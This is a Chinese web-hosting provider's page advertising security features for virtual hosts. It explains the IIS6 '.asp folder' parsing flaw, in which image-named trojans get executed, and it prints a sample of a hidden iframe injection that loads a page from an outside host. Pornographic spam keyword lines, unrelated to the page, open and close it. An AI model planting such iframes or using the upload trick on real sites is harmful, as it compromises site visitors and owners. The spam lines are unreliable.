国产午夜福利100集发布,精品国产污网站直接看,揉BBB搡BBB搡BBB

正在加載中...

客服

網(wǎng)站公告

西部數(shù)碼虛擬主機(jī)升級為10重安全保障！

因系統(tǒng)層出不窮的上傳漏洞，注入漏洞，加之Win2003本身的設(shè)計(jì)缺陷，導(dǎo)致目前國內(nèi)大多數(shù)的中小網(wǎng)站都存在或多或少的安全問題。加之很多網(wǎng)站管理員的安全水平有限，目前網(wǎng)頁病毒木馬非常猖獗。
西部數(shù)碼利用其技術(shù)優(yōu)勢，推出10重安全保障的虛擬主機(jī)，讓菜鳥也不再被木馬困擾！

　　安裝了iis6的所有服務(wù)器，受影響的文件名后綴有.asp .asa .cdx .cer .php .pl .cgi等。

　　網(wǎng)站的超級管理員權(quán)限被盜、網(wǎng)站內(nèi)容被篡改、打開網(wǎng)頁殺毒軟件提示有病毒。

　　Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞，當(dāng)文件夾名為類似hack.asp的時(shí)候（即文件夾名看起來像一個(gè)ASP文件的文件名），此時(shí)此文件夾下的任何類型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被當(dāng)做ASP程序來執(zhí)行。這樣黑客即可上傳擴(kuò)展名為jpg或gif之類的看起來像是圖片文件的木馬文件，通過訪問這個(gè)文件即可運(yùn)行木馬。因?yàn)槲④浬形窗l(fā)布這個(gè)漏洞的補(bǔ)丁，所以幾乎所有網(wǎng)站都會存在這個(gè)漏洞。并且，經(jīng)我司技術(shù)人員測試，這個(gè)問題不限于asp,甚至php, CGI等都存在這種問題。目前國內(nèi)大部分的網(wǎng)站都是運(yùn)行在IIS6下，如果這些網(wǎng)站中有任何一個(gè)文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾，那么放在這些文件夾下面的任何類型的文件都有可能被認(rèn)為是腳本文件而交給腳本解析器而執(zhí)行，如果黑客將一個(gè) hack.asp 文件改名為 hack.gif 上傳到這些目錄中，那么不堪設(shè)想...

Stream開關(guān)設(shè)置
　　ASP中的ADODB.Stream 對象用來操作二進(jìn)制或文本數(shù)據(jù)的流。通常用于無組件上傳和驗(yàn)證碼等功能。關(guān)閉該組件可以提高網(wǎng)站安全。

Fso開關(guān)設(shè)置
　　FSO(FileSystemObject)是微軟ASP的一個(gè)對文件操作的控件，該控件可以對服務(wù)器進(jìn)行讀取、新建、修改、刪除目錄以及文件的操作。關(guān)閉該組件有利于提高網(wǎng)站安全。

Ftp權(quán)限設(shè)置
　　如果你的網(wǎng)站建好后，今后一段時(shí)間都不會再用到ftp上傳功能，您可以暫時(shí)關(guān)閉FTP上傳。這有助于提高網(wǎng)站的安全，即使ftp密碼泄露，黑客也不能操作你空間內(nèi)的文件。設(shè)置后60秒后生效。

腳本權(quán)限設(shè)置
　　您可以設(shè)置您的網(wǎng)站支持哪些網(wǎng)站腳本，如果您的網(wǎng)站只使用了asp，您可以設(shè)置為只開放asp權(quán)限。這樣黑客即使上傳了php的木馬到您的空間也不能運(yùn)行！最少的權(quán)限＝最大的安全！

寫入權(quán)限設(shè)置
　　本系統(tǒng)支持全國領(lǐng)先的目錄權(quán)限設(shè)置，允許關(guān)閉網(wǎng)站的寫入權(quán)限，鎖定虛擬主機(jī)。對安全有重要意義，例如可以將access數(shù)據(jù)庫放在databases目錄，而將wwwroot目錄的寫入權(quán)限關(guān)閉，令asp木馬根本無法上傳，這樣比關(guān)閉FSO更安全。

IP 限制
　　您可以明確拒絕或授權(quán)某些IP地址對您網(wǎng)站的訪問。對某些重要的子目錄，如論壇的后臺管理目錄/admin/您可以設(shè)置為所有人拒絕訪問，只允許您自己的ip訪問.這樣即使黑客知道了你論壇的超級管理密碼，也無法對你的論壇進(jìn)行管理和破壞！

文件保護(hù)
　　您可以設(shè)置您要保護(hù)的文件，當(dāng)文件被保護(hù)之后，該文件將無法從web訪問。您可以使用該功能來保護(hù)您的重要文件的安全性，比如ACCESS數(shù)據(jù)庫等。

目錄保護(hù)
　　通常用戶網(wǎng)站被黑（如網(wǎng)頁被篡改,文件被盜，被刪等）都是因?yàn)楹诳屯ㄟ^網(wǎng)站的文件上傳功能將asp/php木馬上傳到空間并運(yùn)行造成的。　　所以在無法確認(rèn)系統(tǒng)是否存在上傳漏洞的情況下，只要保證文件上傳目錄沒有腳本運(yùn)行權(quán)限，那么即便黑客將木馬上傳到您的空間他也無法運(yùn)行,這樣就無法危及您的網(wǎng)站，使您網(wǎng)站更安全。

自動查殺病毒木馬
　　功能介紹：如果您的網(wǎng)站存在上傳漏洞或注入漏洞，很容易被黑客上傳木馬，添加病毒代碼。查看您的網(wǎng)頁源代碼，會發(fā)現(xiàn)病毒代碼一般是：　
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等，而黑客通常會在您的網(wǎng)站里面留下后門程序，如海洋頂端asp木馬，以便日后再次侵入您的網(wǎng)站。使用該功能，可以將這些病毒木馬一網(wǎng)打盡！

服務(wù)器端自動殺毒
　　因傳統(tǒng)殺毒軟件不能有效地識別網(wǎng)頁木馬，特別是網(wǎng)頁木馬經(jīng)常被加殼或制作為變種!所以我司自主開發(fā)了專門針對網(wǎng)頁木馬的殺毒軟件，每天晚上自動掃描所有網(wǎng)站。發(fā)現(xiàn)病毒的，對該文件自動更名;發(fā)現(xiàn)iframe木馬的，對木馬代碼自動清除;并自動通過電子郵件通知你,讓您輕松掌握您的網(wǎng)站情況
(業(yè)界獨(dú)有)

[網(wǎng)易] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷發(fā)表于 2007-02-16

[動易] 動易2006最新漏洞公告（2007-2-15）

[積木網(wǎng)] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷

[動易網(wǎng)絡(luò)] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-3-15

[IT站長網(wǎng)] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-3-3

[360安全論壇] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-2-27

[csdn] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷

[迪賽網(wǎng)] 動網(wǎng)論壇上傳文件漏洞的原理以及攻擊的代碼實(shí)現(xiàn)

[網(wǎng)絡(luò)安全社區(qū)] 動網(wǎng)最新漏洞使用代碼

亚洲卡1卡2卡四卡乱码,国产亚洲美日韩AV中文字幕,精品国产重口乱子伦,91在线免费观看网站

域名注冊

域名交易

域名服務(wù)

主機(jī)產(chǎn)品

管理中心